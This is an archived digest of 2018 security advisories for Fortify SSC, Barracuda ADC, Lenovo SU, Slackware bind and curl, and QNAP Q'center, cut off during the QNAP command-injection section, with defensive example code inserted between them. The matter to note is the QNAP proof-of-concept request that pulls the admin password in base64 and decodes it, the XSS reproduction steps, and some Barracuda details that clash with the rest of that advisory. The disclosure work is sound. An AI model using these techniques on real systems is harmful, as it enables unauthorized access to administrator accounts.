[security bulletin] MFSBGN03811 rev.1 - Fortify Software Security Center (SSC), Multiple vulnerabilities

2018-07-12 Thread cyber-psrt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03201085

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03201085
Version: 1

MFSBGN03811 rev.1 - Fortify Software Security Center (SSC), Multiple
vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-07-12
Last Updated: 2018-07-12

Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of
Privileged Information, Unauthorized Data Injection

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
An XML external entity (XXE) vulnerability in Fortify Software Security
Center (SSC) allows remote unauthenticated users to read arbitrary files or
conduct server-side request forgery (SSRF) attacks via a crafted DTD in an
XML request.

References:

  - PSRT110617
  - CVE-2018-12463

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Fortify Software Security Center (SSC) v17.1, 17.2, 18.1

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to extend a special thanks to Alex Hernandez aka
alt3kx for responsibly disclosing this vulnerability.

RESOLUTION

Apply hotfix to SSC 17.1, 17.2, and 18.1, as applicable.
(Download hotfix via ftp at  or, alternatively, go to Software Support
Online at  and log into your SSO account.)

HISTORY
Version:1 (rev.1) - 12 July 2018 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Micro Focus products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel. 
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin
alerts via Email, please subscribe here -
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under
product and document types.
 Please note that you will need to sign in using a Passport account. If you do
not have a Passport account yet, you can create one - it's free and easy:
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to
maintain system integrity. Micro Focus is continually reviewing and enhancing
the security features of software products to provide customers with current
secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring
to the attention of users of the affected Micro Focus products the important
security information contained in this Bulletin. Micro Focus recommends that
all users determine the applicability of this information to their individual
situations and take appropriate action. Micro Focus does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, Micro Focus will not be responsible for any damages resulting
from user's use or disregard of the information provided in this Security
Bulletin. To the extent permitted by law, Micro Focus disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose, title and
non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions
contained herein. The information provided is provided "as is" without
warranty of any kind. To the extent permitted by law, neither Micro Focus nor
its affiliates, subcontractors or suppliers will be liable for incidental,
special or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or services; or
damages for loss of data, or software restoration.
The information in this document is subject to

Barracuda ADC v5.x - Multiple Persistent Vulnerabilities

2018-07-12 Thread Vulnerability Lab
Document Title:
===============
Barracuda ADC v5.x - Multiple Persistent Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1424


Release Date:
=============
2018-07-12


Vulnerability Laboratory ID (VL-ID):

1424


Common Vulnerability Scoring System:

3.8


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

2.000€ - 3.000€


Product & Service Introduction:
===============================
Ensure Application Scalability, Performance, and Security. The Barracuda
Load Balancer ADC is ideal for organizations looking for
a high-performance, yet cost-effective application delivery and security
solution. With the broadest range of hardware and virtual
models, the Barracuda Load Balancer ADC provides maximum flexibility for
organizations looking to build highly secure and scalable
application infrastructure, whether it’s deployed on-premises or in the
cloud.

(Copy of the Vendor Homepage:
https://www.barracuda.com/products/loadbalancer )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple
persistent input validation web vulnerabilities in the Barracuda Networks
ADC v5.2.0.004 appliance web-application.


Vulnerability Disclosure Timeline:
==================================
2018-07-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):

Barracuda Networks
Product: ADC Load Balancer - Appliance Web Application 5.2.0.004


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:

No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in
the official Barracuda Networks ADC appliance web-application.
The application-side vulnerability allows remote attackers and
privileged user accounts to inject malicious script code to compromise
the online service web-application.

The application-side input validation web vulnerability is located in
the `last hour`, `last day` and `last week` time duration values of the
traffic statistics module. Local low-privileged application user accounts
can inject malicious script code with a persistent attack vector
into the vulnerable module. The injection point of the issue is the
vulnerable rules add module and the execution of the malicious code
occurs via the restapi (api) in the Dashboard Index module of the
index.cgi file.

The input forms of the appliance web-application are filtered. Even
though the input is filtered, the internal validation does not encode the
input or restrict the values. Attackers do not need to bypass the filter
validation because the code executes directly through the main service
in the dashboard web content.

The security risk of the persistent input validation web vulnerability
is estimated as medium with a cvss (common vulnerability scoring system)
count of 3.8. Exploitation of the persistent vulnerability in the
`invitation to collaborate` module requires a low privileged heroku account
with low user interaction. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
redirect to external source and persistent manipulation of affected or
connected module context.
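
The description above turns on the difference between filtering input and encoding output: a value that passed the input filter is stored and later written into the dashboard unencoded. The following is an added example and not code from the advisory or from the Barracuda ADC: a renderer that HTML-encodes stored duration labels at the moment they are written into the page, so the input filter's strength no longer matters. The labels, the tile markup and the `naive_input_filter` are constructed for the demonstration.

```python
"""Output-encode stored values at render time, whatever the input filter did.

Added example with constructed labels; it does not model Barracuda ADC code.
"""
import html
import re

# A typical input-side blocklist: strips <script> tags and nothing else.
# Storing its output is not the same as encoding it for HTML.
_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def naive_input_filter(value: str) -> str:
    """What a blocklist filter stores: anything that is not a <script> tag."""
    return _SCRIPT_TAG.sub("", value)


def render_duration_tile(label: str, seconds: int) -> str:
    """Render one traffic-statistics tile whose label came from a user."""
    # html.escape with quote=True neutralises < > & " ', so the label is
    # inert both as element text and inside the double-quoted title attribute.
    safe = html.escape(label, quote=True)
    return (f'<div class="tile" title="{safe}">'
            f'<span>{safe}</span><b>{int(seconds)}</b></div>')


def render_dashboard(stored: dict) -> str:
    """Render every stored duration; encoding happens here, not on input."""
    return "\n".join(render_duration_tile(k, v) for k, v in stored.items())


def leaks_markup(rendered: str) -> bool:
    """True if any tag other than the renderer's own reached the page."""
    allowed = {"div", "/div", "span", "/span", "b", "/b"}
    tags = re.findall(r"<([^>]+)>", rendered)
    return any(t.split()[0] not in allowed for t in tags)


# Constructed labels as they would sit in storage after the input filter ran.
STORED_LABELS = {
    "last hour": 3600,
    "last day": 86400,
    naive_input_filter("last <b>week</b>"): 604800,  # filter left this alone
}

if __name__ == "__main__":
    page = render_dashboard(STORED_LABELS)
    print(page)
    print("foreign markup in page:", leaks_markup(page))
```

Encoding has to match the output context: `html.escape` covers element text and double-quoted attributes, which is where the tile writes the label; a value placed inside a script block or a URL would need that context's own encoding instead.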


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Traffic - Web Conversions

Vulnerable Parameter(s):
[+] last hour (input time duration)
[+] last days (input time duration)
[+] last week (input time duration)

Affected Module(s):
[+] Dashboard - Traffic


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by
remote attackers and local low-privileged application user accounts with
low or medium user interaction.
For security demonstration or to reproduce the security vulnerability,
follow the provided information and steps below.

Manual steps to reproduce the security vulnerability ...
1. Open the Barracuda ADC web-application
2. Surf to the web traffic > web applications module
3. Open the add mode to inject a script code as payload or use the edit
existing (payload)
Note: Inject into the last hour, last day and last week input fields
4. Now surf back to the main dashboard module
5. The application-side script code execution occurs in the displayed
time duration values
6. Successfully reproduced the persistent security vulnerability!


Vulnerable Module(s): Dashboard > Traffic Statistics
Request Method(s): POST


PoC: Link

Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability

2018-07-12 Thread Vulnerability Lab
Document Title:
===============
Lenovo SU v5.07 - Buffer Overflow & Code Execution Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2131

Lenovo Security ID: LEN-19625

https://nvd.nist.gov/vuln/detail/CVE-2018-9063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9063

Acknowledgements: https://support.lenovo.com/us/fr/solutions/len-19625

News & Press References:
https://www.securityweek.com/lenovo-patches-secure-boot-vulnerability-servers
https://securityaffairs.co/wordpress/72335/security/lenovo-security-updates.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9063

CVE-ID:
=======
CVE-2018-9063


Release Date:
=============
2018-07-12


Vulnerability Laboratory ID (VL-ID):

2131


Common Vulnerability Scoring System:

7.8


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

4.000€ - 5.000€


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local
buffer overflow vulnerability in the official Lenovo SU v5.7.x & v5.6.x
software.


Vulnerability Disclosure Timeline:
==================================
2018-05-03: Release Date (Lenovo)
2018-07-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):

Lenovo
Product: SU (MapDrv - mapdrv.exe) 5.7.19, 5.6.34, 5.6.0.28 & 5.6.0.27


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
No User Interaction


Disclosure Type:

Responsible Disclosure Program


Technical Details & Description:

A local buffer overflow and arbitrary code execution have been discovered
in the official Lenovo SU v5.7.x & v5.6.x software.
The vulnerability allows overwriting the active registers of the
process to compromise the affected software by gaining
higher system access privileges.

MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) contains a local
vulnerability where an attacker entering a very large user ID
or password can overrun the program's buffer, causing undefined
behaviors, such as execution of arbitrary code. No additional privilege is
granted to the attacker beyond what is already possessed to run MapDrv.
The flaw could be exploited by local attackers for different kinds
of attacks, including the execution of arbitrary code on the target machine.

Exploitation of the local buffer overflow vulnerability requires no user
interaction and system user process privileges of the driver.
Successful exploitation of the buffer overflow vulnerability results in
a compromise of the local system process or affected computer system.

Vulnerable Driver:
[+] MapDrv

Affected Process:
[+] mapdrv.exe


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers with system
process privileges and without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below.


--- Debug Error Exception Session Log (Exception) ---
(d8c.1988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=029ab7a0 ebx=0031fe05 ecx=0041 edx=fd974860 esi=029a9d70 edi=0031fd04
eip=00a256b3 esp=0031e54c ebp=0031fc70 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
*** ERROR: Module load completed but symbols could not be loaded for image00a20000
image00a20000+0x56b3:
00a256b3 66890c02        mov     word ptr [edx+eax],cx    ds:0023:00320000=????

--- Debug Session Log [Exception Analysis] ---
FAULTING_IP:
image00a20000+56b3
00a256b3 66890c02        mov     word ptr [edx+eax],cx

EXCEPTION_RECORD:   -- (.exr )
ExceptionAddress: 00a256b3 (image00a20000+0x000056b3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00320000
Attempt to write to address 00320000

FAULTING_THREAD:  00001988
PROCESS_NAME:  image00a20000
FAULTING_MODULE: 77ab0000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP:  594b6578
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx
referenced memory at 0x%08lx. The memory could not be %s.
WRITE_ADDRESS:  00320000
BUGCHECK_STR:  ACCESS_VIOLATION

IP_ON_HEAP:  00410041
The fault address in not in any loaded module, please check your build's
rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module
which may contain the address if it were loaded.

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS
FRAME ONE INVALID: 18002a

[slackware-security] bind (SSA:2018-192-01)

2018-07-12 Thread Slackware Security Team


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  bind (SSA:2018-192-01)

New bind packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/bind-9.10.8-i586-1_slack14.2.txz:  Upgraded.
  This update fixes security issues:
  Fixed a bug where extraordinarily large zone transfers caused several
  problems, with possible outcomes including corrupted journal files or
  server exit due to assertion failure.
  Don't permit recursive query service to unauthorized clients.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5738
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.13-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.13-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.13-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.13-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bind-9.10.8-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bind-9.10.8-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.13.2-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.13.2-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
3df72fb1579a8c0689314047f43a0a2d  bind-9.9.13-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
4bc232339338d13ff37e81a7c781d26d  bind-9.9.13-x86_64-1_slack14.0.txz

Slackware 14.1 package:
721d903ce5a68d71dcb9801cc658d8c8  bind-9.9.13-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
fb3b6f8b0c6d644624094e0f07429fbd  bind-9.9.13-x86_64-1_slack14.1.txz

Slackware 14.2 package:
82149ea36a5c8364764ee2f04349a24e  bind-9.10.8-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
3f6b151875e2486d262e99b341fb5023  bind-9.10.8-x86_64-1_slack14.2.txz

Slackware -current package:
509e76121146d18f3872db28b4abf98f  n/bind-9.13.2-i586-1.txz

Slackware x86_64 -current package:
87622e82d50313b87c8860960af89d5e  n/bind-9.13.2-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg bind-9.10.8-i586-1_slack14.2.txz

Then, restart the name server:

# /etc/rc.d/rc.bind restart


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAltGjUwACgkQakRjwEAQIjOe6gCfQ0nicbuT5NCcvtzRI+nFiZ+M
xWIAn0GpGwxA1KkquTnWeGZ3tzPzyYeJ
=XqhD
-----END PGP SIGNATURE-----


[slackware-security] curl (SSA:2018-192-02)

2018-07-12 Thread Slackware Security Team


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  curl (SSA:2018-192-02)

New curl packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/curl-7.61.0-i586-1_slack14.2.txz:  Upgraded.
  This update fixes a buffer overflow in SMTP send.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0500
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.61.0-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.61.0-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.61.0-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.61.0-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/curl-7.61.0-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/curl-7.61.0-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.61.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.61.0-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
fbcfd446b8068e16a43c28ca742f2650  curl-7.61.0-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
21bf24cfa0acd12a8aa7d7e022a2ca17  curl-7.61.0-x86_64-1_slack14.0.txz

Slackware 14.1 package:
37135b04c91293591591e2118d7f3030  curl-7.61.0-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
05c6d3cba63f0bdf13398f67f2a70aad  curl-7.61.0-x86_64-1_slack14.1.txz

Slackware 14.2 package:
b570adabc34d5e79b83fb41220825738  curl-7.61.0-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
ac45db4dd8bed91a4fffcfc34bb117c8  curl-7.61.0-x86_64-1_slack14.2.txz

Slackware -current package:
5c8c2504722db0cddbfa0f6452af5464  n/curl-7.61.0-i586-1.txz

Slackware x86_64 -current package:
3f5d0f918f5d5dc08268e36ed17e9fe6  n/curl-7.61.0-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg curl-7.61.0-i586-1_slack14.2.txz
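
Both Slackware advisories above (bind, SSA:2018-192-01, and curl, SSA:2018-192-02) publish an MD5 per package and then tell the reader to run `upgradepkg`. The following is an added example, not a Slackware tool: it parses the "MD5 signatures" section of an advisory and checks downloaded package bytes against it before anything is installed. The advisory excerpt embedded below is copied from the bind message above; the package bytes fed to the check are constructed.

```python
"""Check downloaded Slackware patch packages against an advisory's MD5 list.

Added example, not a Slackware tool. The advisory excerpt is copied from the
bind (SSA:2018-192-01) message; the package contents used are constructed.
"""
import hashlib
import hmac
import re
from pathlib import Path

# One listing line: 32 hex digits, whitespace, a package path such as
# "n/bind-9.13.2-i586-1.txz" or "bind-9.10.8-i586-1_slack14.2.txz".
MD5_LINE = re.compile(r"^([0-9a-f]{32})\s+(\S+)$", re.MULTILINE)


def parse_md5_block(advisory_text: str) -> dict:
    """Map package file name -> expected MD5 from the 'MD5 signatures' section."""
    start = advisory_text.find("MD5 signatures:")
    if start < 0:
        raise ValueError("advisory has no 'MD5 signatures' section")
    end = advisory_text.find("Installation instructions:", start)
    block = advisory_text[start:end if end > 0 else None]
    # Path().name drops the "n/" prefix the -current listings carry.
    return {Path(name).name: digest for digest, name in MD5_LINE.findall(block)}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_package(data: bytes, expected_md5: str) -> bool:
    """Constant-time comparison of the computed digest with the listed one."""
    return hmac.compare_digest(md5_hex(data), expected_md5.lower())


def check_downloads(advisory_text: str, downloads: dict) -> dict:
    """Return {file name: 'ok' | 'MISMATCH' | 'not-listed'} for each download."""
    expected = parse_md5_block(advisory_text)
    results = {}
    for name, data in downloads.items():
        if name not in expected:
            results[name] = "not-listed"
        else:
            results[name] = "ok" if verify_package(data, expected[name]) else "MISMATCH"
    return results


# Copied from the bind advisory above (three of its entries).
ADVISORY_EXCERPT = """\
MD5 signatures:
+-----+

Slackware 14.2 package:
82149ea36a5c8364764ee2f04349a24e  bind-9.10.8-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
3f6b151875e2486d262e99b341fb5023  bind-9.10.8-x86_64-1_slack14.2.txz

Slackware -current package:
509e76121146d18f3872db28b4abf98f  n/bind-9.13.2-i586-1.txz

Installation instructions:
"""

if __name__ == "__main__":
    # Constructed stand-in for a download; it will not match the real digest.
    fake = {"bind-9.10.8-i586-1_slack14.2.txz": b"constructed, not the real package"}
    print(check_downloads(ADVISORY_EXCERPT, fake))
```

A matching MD5 shows the file you fetched is the one the advisory describes; it does not show the advisory itself is genuine, since MD5 is not collision resistant and the listing travelled in the same e-mail. For authenticity, verify the PGP signature on the message (the team's key is linked in the message) and the package's own detached `.asc` signature before running `upgradepkg`.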


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAltGjU4ACgkQakRjwEAQIjMBBQCghtpyyZsQIuLr/1q/DhyedQ4X
+4gAn2ljECzyNNA+Vp8h/TGcZZKKHZ/t
=FIzW
-----END PGP SIGNATURE-----


[CORE-2018-0006] - QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

2018-07-12 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710

3. *Vulnerability Description*

QNAP's website states that:

[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.

The platform provides centralized web-based administration to manage
the following features:

- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographic reports

Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.

4. *Vulnerable versions*

. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

QNAP published the following Security Note:

. https://www.qnap.com/en-us/security-advisory/nas-201807-10

6. *Credits*

These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.

Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.

7.1. *Privilege escalation*

[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which comes
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user encoded in base64.

Any authenticated user could access this API endpoint and retrieve the
admin user's password, therefore being able to login as an administrator.

The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.

/-
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close

HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close

{
  "total_count": 2,
  "account": [
    {
      "dst_enable": false,
      "name": "admin",
      "default": true,
      "new_password": "YWRtaW5pc3RyYWRvcg==",
      "authentication": 0,
      "create_time": {
        "$date": 1519917983616
      },
      "role": 4294967295,
      "timezone_code": 17,
      "last_login": {
        "$date": 1519929869797
      },
      "_id": "5a981b9f3af7e2030c883592",
      "email": "",
      "description": "administrator"
    },
    {
      "dst_enable": false,
      "name": "viewer",
      "register_code": "",
      "authentication": 0,
      "create_time": {
        "$date": 1519929122332
      },
      "role": 1082130432,
      "timezone_code": 17,
      "last_login": {
        "$date": 1519932215818
      },
      "_id": "5a9847223af7e2034924e7b6",
      "email": "",
      "description": ""
    }
  ]
}
-/

As can be seen in the following excerpt, the decoded base64 data
corresponds to the plaintext administrator password set at installation
time.

/-
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
administrador
-/
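
A check of the kind that would have caught the exposure in section 7.1 before release, added here as an example and not code from Core Security or from QNAP: walk an API response, flag fields whose names suggest credentials, and try a base64 decode on them, since base64 is an encoding rather than a cipher. The response body embedded below is the advisory's own (trimmed to the fields that matter), so the decoded value is the one the advisory shows; the field-name heuristic and the JSON-path notation are this example's assumptions.

```python
"""Scan a JSON API response for fields that leak credentials.

Added example; the response body is the advisory's section 7.1 response,
trimmed. The sensitive-name heuristic is an assumption of this example.
"""
import base64
import json
import re
import string

SENSITIVE_NAME = re.compile(r"passw(or)?d|secret|token|api_?key", re.IGNORECASE)
BASE64_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def walk(obj, path="$"):
    """Yield (json_path, key, value) for every key in a nested JSON object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield f"{path}.{key}", key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            yield from walk(item, f"{path}[{i}]")


def try_base64_text(value):
    """Return the decoded printable text if value is base64 of text, else None."""
    if not isinstance(value, str) or len(value) % 4 or not BASE64_SHAPE.fullmatch(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    return text if text and all(c in string.printable for c in text) else None


def find_leaked_credentials(body: str) -> list:
    """Return [(json_path, decoded_or_raw_value)] for sensitive-looking fields.

    A decoded value means the field was merely encoded, i.e. sent in the clear.
    """
    findings = []
    for path, key, value in walk(json.loads(body)):
        if SENSITIVE_NAME.search(key) and isinstance(value, str) and value:
            decoded = try_base64_text(value)
            findings.append((path, decoded if decoded is not None else value))
    return findings


# The advisory's response, trimmed to the fields relevant here.
RESPONSE_BODY = """{
  "total_count": 2,
  "account": [
    {"name": "admin", "default": true,
     "new_password": "YWRtaW5pc3RyYWRvcg==",
     "role": 4294967295, "_id": "5a981b9f3af7e2030c883592",
     "description": "administrator"},
    {"name": "viewer", "register_code": "",
     "role": 1082130432, "_id": "5a9847223af7e2034924e7b6",
     "description": ""}
  ]
}"""

if __name__ == "__main__":
    for path, value in find_leaked_credentials(RESPONSE_BODY):
        print(f"{path}: {value!r}")
```

Run against recorded responses in an API test suite, a scan like this turns the advisory's finding into a regression check: the account listing should return no credential-bearing field for any role, and a base64 value that decodes to readable text is still a plaintext disclosure.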

7.2. *Command Execution in change password for the admin user*

[CVE-2018-0707]
When the admin user performs a password change, the application